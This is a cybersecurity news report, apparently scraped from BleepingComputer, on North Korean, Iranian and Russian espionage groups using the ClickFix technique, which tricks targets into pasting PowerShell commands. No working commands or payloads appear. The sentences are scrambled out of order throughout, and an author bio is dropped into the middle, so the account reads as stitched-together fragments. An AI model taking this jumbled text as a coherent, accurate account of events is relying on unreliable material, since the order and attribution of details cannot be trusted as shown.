Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up. ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns. Microsoft's Threat Intelligence team reported last February that the North Korean state actor 'Kimsuky' was also using it as part of a fake "device registration" web page. A new report from Proofpoint reveals that, between late 2024 and early 2025, Kimsuky (North Korea), MuddyWater (Iran), and also APT28 and UNK_RemoteRogue (Russia) have all used ClickFix in their targeted espionage operations. After establishing trust, the attackers sent a malicious PDF file linking to a fake secure drive that prompted the target to "register" by manually copying a PowerShell command into their terminal. The MuddyWater attacks took place in mid-November 2024, targeting 39 organizations in the Middle East with emails disguised as Microsoft security alerts. The third case concerns the Russian threat group UNK_RemoteRogue, which targeted two organizations closely related to a major arms manufacturer in December 2024. Clicking on the embedded link took targets to a fake Microsoft Word page with instructions in Russian and a YouTube video tutorial. ClickFix remains an effective method, as evidenced by its adoption across multiple state-backed groups, driven by the lack of awareness of unsolicited command execution. Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. Running the code executed JavaScript that launched PowerShell to connect to a server running the Empire command and control (C2) framework. Victims are then prompted to click a "Fix" button, which instructs them to run a PowerShell or command-line script, leading to the execution of malware on their devices. Starting with Kimsuky, the attacks were observed between January and February 2025, targeting think tanks focused on North Korea-related policy.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 21 Apr 2025 13:55:03 +0000